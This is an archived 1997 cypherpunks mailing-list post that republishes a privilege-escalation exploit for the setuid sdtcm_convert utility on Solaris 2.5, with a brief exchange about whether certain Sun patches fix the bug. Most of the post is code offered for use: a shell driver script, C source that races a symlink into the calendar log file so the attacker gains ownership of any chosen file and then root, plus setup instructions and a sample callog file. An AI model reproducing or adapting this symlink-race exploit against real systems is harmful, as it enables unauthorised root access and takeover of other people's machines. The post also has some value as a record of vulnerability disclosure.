1997-02-23 - Exploit for sdtcm_convert - Solaris 2.5 - second

Header Data

From: Cristian SCHIPOR <skipo@sundy.cs.pub.ro>
To: cypherpunks@toad.com
Message Hash: 2e884c5582549d4f26ecd942c3ab4419c0ec9a44832ac4482546e44f3ec1988a
Message ID: <Pine.GSO.3.95.970223111505.1649C-100000@sundy.cs.pub.ro>
Reply To: N/A
UTC Datetime: 1997-02-23 09:21:50 UTC
Raw Date: Sun, 23 Feb 1997 01:21:50 -0800 (PST)

Raw message

From: Cristian SCHIPOR <skipo@sundy.cs.pub.ro>
Date: Sun, 23 Feb 1997 01:21:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Exploit for sdtcm_convert - Solaris 2.5 - second
Message-ID: <Pine.GSO.3.95.970223111505.1649C-100000@sundy.cs.pub.ro>
MIME-Version: 1.0
Content-Type: text/plain



Sun Feb 23 10:36:58 EET 1997 Romania

"Exploit for sdtcm_convert - Solaris 2.5"

I send you an e-mail about a bug and an exploit for sdtcm_convert.
(sdtcm_convert allows you to become owner of any file or directory from
the system - and gain root access )

First, there was some problems with my uuencoded exploit (some damaged it
on the route...) so i'll resend you the files for exploit.

Second, Casper Dick send me:

>Is this the bug fixed in the Sun patches:

>103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
>103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
>103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86
version)
>103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86
version)


>or is it a new one?

>Casper

I cant found this patches to verify if that fix the problem i have
found or not. Anyway you have an exploit ! (execute 'thefist' and wait)

Cristian Schipor - Computer Science Faculty - Bucharest - Romania

Email: skipo@math.pub.ro skipo@sundy.cs.pub.ro skipo@ns.ima.ro
Phone: (401) 410.60.88


------------------------- file thefirst ------------------------------------
/bin/echo "orange.c -> orange"
gcc -o orange orange.c

/usr/ucb/whoami > wh
read USER < ./wh

#watching for callog file if it isnt will stop
if ! test -f /var/spool/calendar/callog.$USER; then
  /bin/echo "I cant found callog file. Please read README and create it"
  exit;
fi

/bin/echo "what's the target ???"
read TARGET

/bin/echo /bin/chmod 000 /var/spool/calendar/callog.$USER >lemon
/bin/echo /usr/dt/bin/sdtcm_convert $USER >>lemon
/bin/chmod 700 ./lemon

./orange $TARGET $USER

------------------------- end --------------------------
------------------------ file orange.c ---------------------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

#define path  "/var/spool/calendar/callog."


void main(int argc, char *argv[])
{
int pid,filedes[2];
FILE *f;
struct stat info;
long i;
char target[128],shift[128];
	
	strcpy(target,argv[1]);
	strcpy(shift,path);
	strcat(shift,argv[2]);
	if(pipe(filedes))
	{
		perror("cant crate pipe\n");
		exit(0);
	}	
	if(pid=fork()==0)
	{
		for(i=0;i<30000000;i++);
		unlink(shift);
		symlink(target,shift);
		write(filedes[1],"y\n",sizeof("y\n"));
	}				
	else 
	{
		close(0);
		dup(filedes[0]);
		system("lemon");
		stat(target,&info);
		if(info.st_uid==getuid()) printf("COLL I did IT !!!\n");
	}
	
}

------------------------ end ----------------------------
------------------------ file README ----------------------
*How to make a simple callog file*

If you dont have a /var/spool/calendar/callog.YOU edit callog.example,
replace 'skipo' with your user name and 'sundy.cs.pub.ro' with your
machine name (try first the short name, example: sundy and if you'll have
troubleshotings try the long name, example sundy.cs.pub.ro). After that
copy the new callog file in /var/spool/calendar/callog.YOUR_USER_NAME, run
once sdtcm_convert with your user name (example sdtcm_convert skipo)
and wait for corrections. Now you are ready to run the exploit.
Another way is to run calendar tool from CDE.
------------------------- end -------------------------------
------------------------ file callog.example ------------------------
Version: 4
**** start of log on Fri Dec  6 14:07:43 1996 ****

(calendarattributes ("-//XAPIA/CSA/CALATTR//NONSGML Access List//EN","10:access_list","world:2")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN","5:string","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN","6:user","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Character Set//EN","5:string","C.ISO-8859-1")
("-//XAPIA/CSA/CALATTR//NONSGML Date Created//EN","7:date_time","19961206T120743Z")
("-//XAPIA/CSA/CALATTR//NONSGML Product Identifier//EN","5:string","-//DT//NONSGML Calendar Product Version 1//EN")
("-//XAPIA/CSA/CALATTR//NONSGML Version//EN","5:string","-//XAPIA/CSA/VERSION1/NONSGML CSA Version 1//EN")
)
-------------------------- end --------------------------------






Thread